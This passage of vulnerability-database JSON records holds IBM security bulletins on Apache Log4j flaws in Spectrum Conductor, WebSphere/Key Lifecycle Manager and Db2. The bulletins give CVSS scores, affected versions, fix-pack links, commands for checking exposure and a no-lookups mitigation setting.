vulnerabilities (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:28:52", "id": "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "href": "https://www.ibm.com/support/pages/node/6538720", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:46", "description": "## Summary\n\nApache Log4j is used by IBM Spectrum Conductor for generating logs in some of its components such as ELK, ascd, GUI and so on. This bulletin provides interim fixes which include Apache Log4j 2.17.1 to fix arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105) in IBM Spectrum Conductor.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104516| \n\n[sc-2.4.1-build600955](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build600955&includeSupersedes=0> \"sc-2.4.1-build600955\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104513| \n\n[sc-2.5-build600954](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build600954&includeSupersedes=0> \"sc-2.5-build600954\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104512| \n\n[sc-2.5.1-build600953](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build600953&includeSupersedes=0> \"sc-2.5.1-build600953\" ) \n \n## Workarounds and Mitigations\n\nAs detailed above in the **Remediation / Fixes **section.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T02:42:40", "type": "ibm", "title": "Security Bulletin: Due to the use of Apache Log4j, IBM Spectrum Conductor is vulnerable to arbitrary code execution (CVE-2021-44832 and CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-19T02:42:40", "id": "837053881E5EA3C6EA980180D7C7511FA7016F0506D6270160A596789757E6E7", "href": "https://www.ibm.com/support/pages/node/6541736", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:53:58", "description": "## Summary\n\nMultiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832). The fix addresses the vulnerability by removing Apache Log4j.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-4104](<https://vulners.com/cve/CVE-2021-4104>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customers with support extension.\n\n## Remediation/Fixes\n\nDepending on your SKLM/GKLM version, see the relevant instructions:\n\n * SKLM 3.0, 3.0.1, and 4.0\n * GKLM 4.1\n * GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1, 4.0\n\n\\- _Also applicable for SKLM 2.7 (**only for customers with a support extension contract**)._\n\n**Required step: Apply WAS fix pack** \nApply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Recommended additional step: Upgrade Java**\n\nAfter you apply the WAS fix pack, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1\n\n**Required step: Apply WAS fix pack and GKLM fix pack**\n\n 1. Apply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](<https://www.ibm.com/support/pages/node/6538024>).\n 2. Apply [GKLM 4.1.0 FP4](<https://www.ibm.com/support/pages/node/6552274>). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral> \"Fix Central\" ). \n\n**Recommended additional step: Upgrade Java**\n\nAfter you apply the WAS fix pack, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.1\n\nThe issues are fixed in [GKLM 4.1.1 - Fix Pack 3](<https://www.ibm.com/support/pages/node/6529054> \"GKLM 4.1.1 - Fix Pack 3\" ). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T12:55:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T12:55:51", "id": "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "href": "https://www.ibm.com/support/pages/node/6539408", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:44:31", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the system or cause a denial of service. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the Apache Log4j library to 2.17.0. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details. \n\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nNote: These builds supersede the builds provided for resolution to [CVE-2021-44228](<https://www.ibm.com/support/pages/node/6526462> \"CVE-2021-44228\" ) and [CVE-2021-4104](<https://www.ibm.com/support/pages/node/6528678> \"CVE-2021-4104\" )\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135867_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A427692916793185792&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135868_DSClients-linuxia32-client-11.5.6.0-FP000%3A229400084660469792&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135870_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A138274479725175920&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135866_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A979582216771911552&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135869_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A276882097350046112&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135865_DSClients-nt32-client-11.5.6000.1809-FP000%3A661797018354168448&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135864_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A583179472819140992&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| <https://www.ibm.com/support/pages/node/6830623> \n \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:20:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:20:42", "id": "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "href": "https://www.ibm.com/support/pages/node/6528672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:44:31", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105 for bulletins relating to Log4j V2. Updating log4j to a version 2.15.0 or higher also addresses CVE-2021-4104.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured: \n\n\nFederation: \n\n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| \n\nIT39389\n\n| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A980553972695302272&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| \n\nIT39389\n\n| \n\n<https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nA user with SYSADM authority should preform the following:\n\ndb2stop\n\ndb2set DB2_JVM_STARTARGS=\"-Dlog4j2.formatMsgNoLookups=true\"\n\ndb2start\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:17:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:17:23", "id": "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "href": "https://www.ibm.com/support/pages/node/6526462", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:23", "description": "## Summary\n\nIBM 